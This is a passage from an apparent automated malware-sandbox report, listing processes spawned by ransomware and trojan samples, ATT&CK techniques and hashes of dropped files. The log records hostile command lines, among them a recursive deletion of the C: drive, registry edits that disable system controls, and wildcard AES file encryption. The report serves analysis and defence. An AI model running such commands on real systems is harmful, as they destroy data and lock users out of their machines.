      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_7.exe
        
        sahiba_7.exe
        6⤵
        
        PID:5444
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c sahiba_8.exe
        5⤵
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\7zS8750D18A\sahiba_8.exe
        
        sahiba_8.exe
        6⤵
        
        PID:1804
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 484
        5⤵
        Program crash
        
        PID:9568
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.Win32.Crypt.gen-f19dff408fd65268a61ec79e52e8c19780d7364b20560eac8a09f12d14487e19.exe
    HEUR-Trojan.Win32.Crypt.gen-f19dff408fd65268a61ec79e52e8c19780d7364b20560eac8a09f12d14487e19.exe
    3⤵
    PID:6860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
      4⤵
      PID:6756
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe" -a
        5⤵
        
        PID:12176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\note866.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\note866.exe"
      4⤵
      PID:6752
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Foreign.oluc-934f407da9e536002e3dc4426ccdbbe5c3ab56d3ecbdfe1c4430d37e50081fb0.exe
    Trojan-Ransom.Win32.Foreign.oluc-934f407da9e536002e3dc4426ccdbbe5c3ab56d3ecbdfe1c4430d37e50081fb0.exe
    3⤵
    PID:12220
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Gen.abli-345cb79a3b565d3fca05f4143ef8c9a44ff68eede95a2aa0e0b782610cc70814.exe
    Trojan-Ransom.Win32.Gen.abli-345cb79a3b565d3fca05f4143ef8c9a44ff68eede95a2aa0e0b782610cc70814.exe
    3⤵
    PID:180
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~2799.bat Trojan-Ransom.Win32.Gen.abli-345cb79a3b565d3fca05f4143ef8c9a44ff68eede95a2aa0e0b782610cc70814.exe
      4⤵
      PID:6176
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t reg_dword /d 1 /f
        5⤵
        
        PID:9320
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t reg_dword /d 1 /f
        5⤵
        
        PID:7060
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
        5⤵
        
        PID:5980
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t reg_dword /d 1 /f
        5⤵
        
        PID:10316
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t reg_dword /d 1 /f
        5⤵
        
        PID:5664
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t reg_dword /d 1 /f
        5⤵
        
        PID:11424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t reg_dword /d 1 /f
        5⤵
        
        PID:8208
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t reg_dword /d 1 /f
        5⤵
        
        PID:11748
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t reg_dword /d 1 /f
        5⤵
        
        PID:424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t reg_dword /d 4 /f
        5⤵
        
        PID:7808
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe
    Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe
    3⤵
    PID:8504
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\30D0.tmp\30D1.tmp\30D2.bat C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe"
      4⤵
      PID:8632
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\BiltuDas1\Malware" /V "Admin" |findstr /ri "REG_SZ"
        5⤵
        
        PID:1360
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\BiltuDas1\Malware" /V "Admin"
        6⤵
        
        PID:8752
      - C:\Windows\system32\findstr.exe
        
        findstr /ri "REG_SZ"
        6⤵
        
        PID:8964
    - - C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\users.txt"
        5⤵
        
        PID:11976
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe"
        5⤵
        
        PID:8712
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6D0E.tmp\6D1F.tmp\6D20.bat "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Trojan-Ransom.Win32.Gen.abqb-c6a38429b5cbea579548c510307a9de2528beae5a9989aeca43c065bb024b1f1.exe""
        6⤵
        
        PID:9560
        
        C:\Users\Admin\AppData\Local\Temp\6D0E.tmp\aescrypt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6D0E.tmp\aescrypt.exe" -e -p *
        7⤵
        
        PID:6524
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:9516
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:4980
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:9876
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:4868
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:8076
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:6896
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:6524
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:9184
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:8960
        
        C:\Windows\system32\more.com
        
        more +1 "C:\Users\Admin\AppData\Local\Temp\list"
        7⤵
        
        PID:10324
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Gen.abqc-d3613632afb731bcb45fb65eb870677ab92bef952c54f6bbb187d6f1b3a1e277.exe
    Trojan-Ransom.Win32.Gen.abqc-d3613632afb731bcb45fb65eb870677ab92bef952c54f6bbb187d6f1b3a1e277.exe
    3⤵
    PID:12252
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /V/K rd /s /q c:\
      4⤵
      PID:8764
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.GenericCryptor.cys-a7e7e8f0274de08a3f16397c7fc9b0e1088cc8281c78da0e9f4dbc2f401fc75f.exe
    Trojan-Ransom.Win32.GenericCryptor.cys-a7e7e8f0274de08a3f16397c7fc9b0e1088cc8281c78da0e9f4dbc2f401fc75f.exe
    3⤵
    PID:10876
  - - C:\Users\Admin\AppData\Local\Temp\xofiz.exe
      "C:\Users\Admin\AppData\Local\Temp\xofiz.exe"
      4⤵
      PID:10796
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "
      4⤵
      PID:3200
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Gimemo.cdqu-e2259d5971f43f3e020b10d27823ec8fdb7755a988d6ee8d3325a5aaaf9027f7.exe
    Trojan-Ransom.Win32.Gimemo.cdqu-e2259d5971f43f3e020b10d27823ec8fdb7755a988d6ee8d3325a5aaaf9027f7.exe
    3⤵
    PID:7816
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX3\Trojan.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Trojan.exe"
      4⤵
      PID:7280
- - C:\Users\Admin\Desktop\00451\Trojan-Ransom.Win32.Hive.p-1e21c8e27a97de1796ca47a9613477cf7aec335a783469c5ca3a09d4f07db0ff.exe
    Trojan-Ransom.Win32.Hive.p-1e21c8e27a97de1796ca47a9613477cf7aec335a783469c5ca3a09d4f07db0ff.exe
    3⤵
    PID:9556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8648 -ip 8648
1⤵
PID:9712

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:9964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 9388 -ip 9388
1⤵
PID:8400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6332 -ip 6332
1⤵
PID:10732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2200 -ip 2200
1⤵
PID:9620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5832 -ip 5832
1⤵
PID:9676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6108 -ip 6108
1⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 6136 -ip 6136
1⤵
PID:10716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4916 -ip 4916
1⤵
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5556 -ip 5556
1⤵
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5332 -ip 5332
1⤵
PID:7012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 3268 -ip 3268
1⤵
PID:7944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 8736 -ip 8736
1⤵
PID:11560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 10932 -ip 10932
1⤵
PID:11544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6180 -ip 6180
1⤵
PID:11400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 7364 -ip 7364
1⤵
PID:5924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 9504 -ip 9504
1⤵
PID:11540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 9420 -ip 9420
1⤵
PID:11960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 11144 -ip 11144
1⤵
PID:12052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6048 -ip 6048
1⤵
PID:11760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 448 -ip 448
1⤵
PID:5608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 11188 -ip 11188
1⤵
PID:9232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7948 -ip 7948
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9488 -ip 9488
1⤵
PID:11552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 10784 -ip 10784
1⤵
PID:11296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 9264 -ip 9264
1⤵
PID:632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 8980 -ip 8980
1⤵
PID:1408

C:\Windows\system32\cmd.exe
cmd /c start C:\Windows\temp\uy54tfxu.exe
1⤵
PID:9528
- C:\Windows\temp\uy54tfxu.exe
  C:\Windows\temp\uy54tfxu.exe
  2⤵
  PID:10272
- - C:\Windows\temp\uy54tfxu.exe
    C:\Windows\temp\uy54tfxu.exe
    3⤵
    PID:536

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
PID:7572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7944 -ip 7944
1⤵
PID:6288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 3892 -ip 3892
1⤵
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 11864 -ip 11864
1⤵
PID:6392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 10524 -ip 10524
1⤵
PID:8852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 824 -p 5376 -ip 5376
1⤵
PID:9700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3196 -ip 3196
1⤵
PID:6176

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:9360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 2536 -ip 2536
1⤵
PID:11000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 9088 -ip 9088
1⤵
PID:9408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2156 -ip 2156
1⤵
PID:10080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10968 -ip 10968
1⤵
PID:5332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 9352 -ip 9352
1⤵
PID:11832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6980 -ip 6980
1⤵
PID:9500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 6672 -ip 6672
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 6136 -ip 6136
1⤵
PID:6844

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:8316
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:8236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 3540 -ip 3540
1⤵
PID:10408

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:372
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:7792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 10536 -ip 10536
1⤵
PID:6932

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:10368
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:1188

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:10288
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:10236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4068 -ip 4068
1⤵
PID:988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6848 -ip 6848
1⤵
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 8912 -ip 8912
1⤵
PID:9900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 7596 -ip 7596
1⤵
PID:7700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 9200 -ip 9200
1⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 6264 -ip 6264
1⤵
PID:11412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 10040 -ip 10040
1⤵
PID:6316

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:3844
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:8788

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:10148
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:7836

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:6448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 8848 -ip 8848
1⤵
PID:6316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 12120 -ip 12120
1⤵
PID:6224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 11612 -ip 11612
1⤵
PID:9308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Lagu Baru.exe

Filesize
3.3MB

MD5
2eb6daf0033f2a8389c1c4da2bf39d57

SHA1
d5c6d8caa42a5d05cc5e9e996b29beb0a3752b03

SHA256
345cb79a3b565d3fca05f4143ef8c9a44ff68eede95a2aa0e0b782610cc70814

SHA512
3c3b5498e71d4778468dbd34018f3619b7bd661720f912c1fa43e1709ce1ac8f2fe893ed03c7cb2b979ddb38b5d94e7ccd1a9e7ff5a592226b93cb6c48a91ee2

Download Submit
C:\ProgramData\HPathvwra\othvidtiraw.exe

Filesize
10.2MB

MD5
9d1bafca6df85aa3cab5846ab1408984

SHA1
c25531693b7b45b0a9fadf6c81738b4afd8c28c4

SHA256
012eba6182006cf9772ff509896fc2a929b5fe3062f29ed70c451c8ebd393d27

SHA512
c51273671b857e3df84f0ceaf4628110f918ed84937a0973e9aa5aa3dcbef8aacd729d5587f2c981a8c5d35d601f172e1cb609425ef97bbed35b26d2d9380b41

Download Submit
C:\ProgramData\HPathvwra\othvidtiraw.zip

Filesize
65KB

MD5
7f5c604bacf3788db7e54cb78e64d6b3

SHA1
36576d819c2d33fd9e683cf253d7058a350e4fd9

SHA256
3027946473d939555f5e459d4d2ae8fafd20123c8649e2d0f497e199b2e8bd8e

SHA512
b093923bdd5252db1388b6835e08da825b947e526eec086b4d9c341ff3a3478b78acaec8f48583d1d1f90ae90c84b4ebdd8353d222dce28b461f39fd27cedae9

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
d2fb266b97caff2086bf0fa74eddb6b2

SHA1
2f0061ce9c51b5b4fbab76b37fc6a540be7f805d

SHA256
b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a

SHA512
c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
944B

MD5
6bd369f7c74a28194c991ed1404da30f

SHA1
0f8e3f8ab822c9374409fe399b6bfe5d68cbd643

SHA256
878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d

SHA512
8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sonia_5.exe.log

Filesize
847B

MD5
66a0a4aa01208ed3d53a5e131a8d030a

SHA1
ef5312ba2b46b51a4d04b574ca1789ac4ff4a6b1

SHA256
f0ab05c32d6af3c2b559dbce4dec025ce3e730655a2430ade520e89a557cace8

SHA512
626f0dcf0c6bcdc0fef25dc7da058003cf929fd9a39a9f447b79fb139a417532a46f8bca1ff2dbde09abfcd70f5fb4f8d059b1fe91977c377df2f5f751c84c5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HEUR-Trojan.MSIL.Crypt.gen-decfb4fd1bcbf2b07188f6d66543d4266ec971e1e3e9d8e0fe4fd1af23a88278.exe.log

Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
252B

MD5
6d0df85725525ba61cb74bdc8d58436e

SHA1
d1ba75b66a03c8f714e0fc5281111eaf51f83f16

SHA256
020746b781473565af29617119c2cf39c65febd31167d1e457c4aa51b763c1b9

SHA512
fdca3ba71bd5d6a76cb027fa4cba8aaedfb956f3b7b3d78173af0091848af978ee4ab649371fde6bf94b908ee67405a213bf6609ced57a1845f8c5e456088be1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
def29ac8e5cffef459c3d64d6bb18fb2

SHA1
ab64966735208644930daf81af0fde24993d7d20

SHA256
1fc6235ced7ccb482365969ccf76b6e54ed12fb3bb09a7bd37e2fa161a09fe57

SHA512
c62966b63c9d7706beb01c9e29b014c2a10307a06defbb3d0137d7af97f211e87140098617a30f1dc0637f9b0e7d008d5f9b88a8cf2c78d3f97450aa77efef45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
10KB

MD5
304e70ff07a877369f30c43c36afb322

SHA1
27b00410c8978607f9920ca04f0f7473004e0337

SHA256
86638f31a45a1e849c222905db215c058c98ad9699a38ae9a9cfd2a16b922b95

SHA512
298a570f6a11cdb027cf3de510351327a3e61d6d2356720a21931e1aea2c1edd50d6be2b691a0ea7ed550c060fcbfd2a115c07707edeeafcd0d60597e1a942ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
53ab432898ebb1bd95c63c2c47b87702

SHA1
4a233d4890865fd482b63e945b0d6421c8e062c0

SHA256
9f75f05f3876e29896d51ebadcb981dba089c1dcb68095743548ca53e2fc5b15

SHA512
d55096e943aa8838d69b3fd29f10b855619e21c244ebd3a5380d2294656cd862db63489c16ff2fdb3b6690ef17ffa5608a0ac727ce0ec337a2880231f5204514

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
876B

MD5
24df1d43c8327add04bd2cc834300d23

SHA1
7c998fad8247aea705cc11b164818d7cd1969df0

SHA256
ec85db67e61cac726daa8ae25de98689eb6391abbdc365b911d29a695dec3099

SHA512
13d70aa883b2b88b2eecac03424bbb5477e8ca8783ee44f2ba80ba33f0d2d988275896cd07408de6e5735d700c1c7d39c3b381da289519d35ab37c5144028047

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
876B

MD5
dd5f4db6493ed729e2820f5cc334dc60

SHA1
7c392d1e210bbc0a0ce7d3eda5c52aa87c6c62c2

SHA256
9a7546d73b0fe55d948391889fb96b69a3164b470a043dd722ccdf506067f163

SHA512
f04464c909eeb1b4a2ff39e99a97541ae8132b19577b1393d81887e183fbc077224686305aa55fa49854403a6f4f624648927f1cda5dce405a757a1ffa3f8076

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
988B

MD5
b12a5d7c2dc1155dffdb806133e282f3

SHA1
d7a810fca68c4dd30057447936404af166e0e79e

SHA256
32891102ba8b8bd79bd5d8b75a0659ee4ae99df31c8d90a44151cf82d49426b9

SHA512
